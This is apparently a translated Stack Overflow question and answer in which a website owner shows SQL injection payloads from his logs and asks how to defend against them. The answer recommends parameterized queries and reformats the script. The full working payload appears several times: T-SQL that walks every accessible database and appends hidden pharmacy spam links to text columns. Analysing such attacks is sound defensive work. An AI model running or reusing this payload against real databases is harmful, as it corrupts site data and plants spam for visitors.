我在日志中发现以下异常:
mt: 15867';declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in
('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case
ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''inderal 10mg ''+char(60)+''a href="http:''+char(47)+char(47)+''blog.coepd.com''+char(47)+''page''+char(47)+''Keflex-Pill"''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''blog.coepd.com'''' when 1 then ''''blog.coepd.com'''' else
''''blog.coepd.com'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' viagra 25mg''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in
(2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--<br/> sess: 2<
黑客攻击从;声明时刻开始,到--结束。我的所有 Sql 查询都应该参数化,但如果没有,我需要消除这个威胁。
我最好的选择是什么?我有一个特定的数据库“网络”登录帐户。最小化此 Web 登录帐户凭据或拒绝特定 sql 对象的最佳实践是什么?
这个人想做什么?这是另一个黑客尝试:
;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into
@w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''tadalafil 40mg ''+char(60)+''a
href="http:''+char(47)+char(47)+''www.guitar-frets.com''+char(47)+''blog''+char(47)+''page''+char(47)+''synthroid-200mcg.aspx"''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''levofloxacin 750mg'''' when 1 then ''''guitar-frets.com'''' else ''''guitar-frets.com'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' valacyclovir
pill''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin
exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--<br
这是我的日志的快照。如果你从下往上看,你会发现这个黑客正在尝试每个参数来注入(inject)他的代码。
最佳答案
正如其他人所说,使用参数化 SQL 查询。
这是 SQL 格式:
DECLARE @b CURSOR;
DECLARE @s VARCHAR(8000);
DECLARE @w VARCHAR(99);
SET @b=CURSOR
FOR SELECT Db_name()
UNION
SELECT NAME
FROM sys.databases
WHERE ( Has_dbaccess(NAME) != 0 )
AND NAME NOT IN ( 'master', 'tempdb', 'model', 'msdb', Db_name() );
OPEN @b;
FETCH next FROM @b INTO @w;
WHILE @@FETCH_STATUS = 0
BEGIN
SET @s='begin try use ' + @w
+
';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''inderal 10mg ''+char(60)+''a href="http:''+char(47)+char(47)+''blog.coepd.com''+char(47)+''page''+char(47)+''Keflex-Pill"''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''blog.coepd.com'''' when 1 then ''''blog.coepd.com'''' else ''''blog.coepd.com'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' viagra 25mg''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch'
;
EXEC (@s);
FETCH next FROM @b INTO @w;
END;
CLOSE @b--<br/> sess: 2<
以及内部查询:
;
DECLARE @c
CURSOR;DECLARE @d VARCHAR(4000);SET @c=
CURSOR FOR
SELECT ''UPDATE [''+TABLE_NAME+'']
SET [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+
CASE Abs(Checksum(Newid()))%10
WHEN 0 THEN ''''''+Char(60)+''div style="DISPLAY:none"'' +char(62)+''inderal 10mg ''+char(60)+''a href="HTTP:''+char(47)+char(47)+''blog.coepd.com''+char(47)+''page''+char(47)+''keflex-pill"'' +char(62)+''''''+
CASE abs(checksum(newid()))%3
WHEN 0 THEN
''''blog.coepd.com''''
WHEN 1 THEN
''''blog.coepd.com''''
ELSE ''''blog.coepd.com''''
END
+''''''+char(60)+char(47)+''a''+char(62)+'' viagra 25mg''+char(60)+char(47)+''div''+char(62)+''''''
ELSE ''''''''
END
'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN information_schema.columns ON o.NAME=table_name WHERE(
indid IN (0,
1)
)
AND
data_type LIKE ''%varchar''
AND
(
character_maximum_length IN (2147483647,
-1)
);OPEN @c;FETCH next
FROM @c
INTO @d;WHILE @@FETCH_STATUS=0
BEGIN
EXEC (@d);
FETCH next
FROM @c
INTO @d;
END;CLOSE @c
end tryBEGIN catch
END catch
他们基本上试图更新所有数据库和表中的所有文本列。
所以这只是一个垃圾邮件脚本,试图为一些神奇的药丸做广告。
关于c# - 有人试图侵入我的网站,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/36589298/